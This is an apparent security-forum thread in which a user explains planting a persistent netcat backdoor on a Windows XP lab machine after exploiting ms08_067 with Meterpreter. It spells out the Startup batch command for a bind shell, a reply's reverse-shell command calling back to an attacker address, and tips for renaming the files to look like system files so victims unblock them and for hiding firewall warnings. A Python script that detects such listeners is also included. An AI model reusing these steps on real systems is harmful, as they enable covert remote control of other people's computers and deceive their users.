I managed to do my first backdoor.
Lab: Attacker: Dell laptop Inspiron 1525, USB BackTrack4 prefinal
Victim: VirtualBox Windows XP SP2 Home Edition under Linux Ubuntu 9.04.
I think these steps are easy, so anyone who started working with BT as I did a few months ago can try this to see in general how a persistent backdoor works.
First I run Metasploit and exploit smb/ms08_067_netapi with payload windows/meterpreter/reverse_tcp.
After I get an active session, first I disable the firewall with Carlos Perez's script.
Then I upload the file nc.exe to C:\ (or any directory you want) and a batch file named test.bat, which I previously made in Notepad running in Wine, and which I upload to the Startup folder of the victim machine.
Test.bat had this in the file:
Code:
start C:\nc.exe -L -p 5555 -d -e cmd.exe
After I do this and reboot the machine, my backdoor always listens on port 5555 (or you can put some other port), and every time the machine starts you can see for one second a black cmd screen which starts the listener on port 5555.
Then just type on the attack machine: nc (ip of target) 5555 and you will get a reverse shell.
It's far from an ideal backdoor and has many drawbacks, but I think it's a nice way to start to see how backdoors work in general.
If someone has any suggestions (I didn't manage to bypass the firewall without disabling it with the Ruby script first) or something like that, or someone who will try this, they can ask me here and I will help them to make the same thing as me.
You can open a port for nc instead of disabling the firewall.
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Just to correct you (congratulations on your first one by the way), but that is not a reverse shell.
If the test.bat ran:
Code:
nc -nw 10 -d 192.168.1.2 5555 -e cmd.exe
That would make it a reverse shell. As it is you have yourself a bind shell.
Incidentally, it is infinitely easier to work with reverse shells, as you don't get the "Windows is Unprotected" rubbish from the Security Center (unless, of course, you disable the Security Center, which may or may not be noticed by the user).
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Yes, sorry, I meant bind shell; I was fast when I wrote the post.
Yes, of course the drawback is that it may be noticed by the user. I have many new ideas with better things; I just made this to see how it works, and for some other not so experienced users to start with, because it is an easy and nice way to start working with backdoors.
I think that this backdoor will not work in Vista because, as I remember (I must put Vista on a VM), the Startup folder is hidden.
I think in Vista you must do something with the registry.
Also we can use some sort of social engineering.
We can, for example, rename nc.exe to system.exe, or to some file name similar to some files from the Windows system.
Also we can call the bat file not test but winlog.bat, for example.
How this can help us: for example, we make a backdoor like I made my backdoor, and on the victim machine a message pops up that the firewall is turned off after the next reboot.
Of course the victim turns it on again. Then reboots the computer or turns it off. Next time when he boots his Windows, on startup it will say that Windows Firewall blocked a program (nc.exe which we put in the Startup menu), but it will not say that it blocks nc.exe; it will say that it blocks, for example, system.exe, and I think any ordinary user will click unblock because he will think that it is something connected with the system, and he will unblock it. And we have our bind shell in peace.
What do you think about that, Gitsnik?
Also, can we somehow edit the registry with Meterpreter so that this icon when the firewall is off doesn't pop out?
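As an added example (not from the original post or from BackTrack), here is a Python audit script for the Startup-folder persistence described in this thread: it parses batch files for netcat-style listener flags (-L, -p, -e) rather than the executable name, so renaming nc.exe to system.exe as suggested above does not hide it, and it correlates the port with netstat -ano output. The Startup paths, the port and both samples are constructed.

```python
"""Audit for a Startup-folder bind-shell listener (added example, not the thread's code).

Inputs are constructed samples so the script runs offline:
(1) contents of batch files found in a Startup folder, (2) netstat -ano output.
"""
import re

# Constructed sample: one renamed-nc listener (as the thread suggests) and one benign file.
STARTUP_FILES = {
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winlog.bat":
        "start C:\\system.exe -L -p 5555 -d -e cmd.exe\n",
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\update.bat":
        "start C:\\Program Files\\Updater\\update.exe /quiet\n",
}

# Constructed sample: excerpt of `netstat -ano` output on the same host.
NETSTAT_OUTPUT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       932
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       1704
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING       4
"""

# netcat-style listener: -l/-L listen, -p <port>, -e <program to hand the socket to>
LISTENER_RE = re.compile(r"-[lL]\b.*?-p\s*(\d+).*?-e\s+(\S+)")
NETSTAT_RE = re.compile(r"TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)")

def find_startup_listeners(files):
    """Return (path, port, spawned program) for each batch line that starts a listener."""
    hits = []
    for path, body in files.items():
        for line in body.splitlines():
            m = LISTENER_RE.search(line)
            if m:
                hits.append((path, int(m.group(1)), m.group(2)))
    return hits

def listening_ports(netstat_text):
    """Map each listening TCP port to its PID, parsed from netstat -ano output."""
    return {int(port): int(pid) for port, pid in NETSTAT_RE.findall(netstat_text)}

def correlate(files, netstat_text):
    """A Startup listener whose port is actually bound on the host is a high-confidence finding."""
    bound = listening_ports(netstat_text)
    return [{"file": path, "port": port, "spawns": prog, "pid": bound.get(port)}
            for path, port, prog in find_startup_listeners(files)]

if __name__ == "__main__":
    for finding in correlate(STARTUP_FILES, NETSTAT_OUTPUT):
        print(finding)
```

On a live host the same two functions would be fed the real Startup folder contents and `netstat -ano` output; a finding with a non-empty pid means the listener is currently running, not just staged.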
Familiarise yourself with the command line "firewall" commands (no further hints than that). If you're installing your back door, you can just open up the port - assuming the Windows firewall is the only one in use.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Quote: Most people don't even know they can control the networking services from the command line..
I was one of them. But after I read Ed Skoudis' Command Line Kung Fu, everything became clear for me.
blog = Command Line Kung Fu
Also there is a PDF version.
How you spend your time is more important than how you spend your money. Money mistakes can be corrected, but time is gone forever. David Norris
Sorry, but... how do you get an active session with the Windows firewall on?
I tried exactly the same scenario on a victim: VirtualBox Windows XP SP2 Pro Edition under Vista Home Premium, and I cannot get an active session unless I disable the Windows XP firewall.
Is there something that I am missing?
Is there any case where the firewall in XP Professional Edition has different behaviour from Home Edition?
Thanks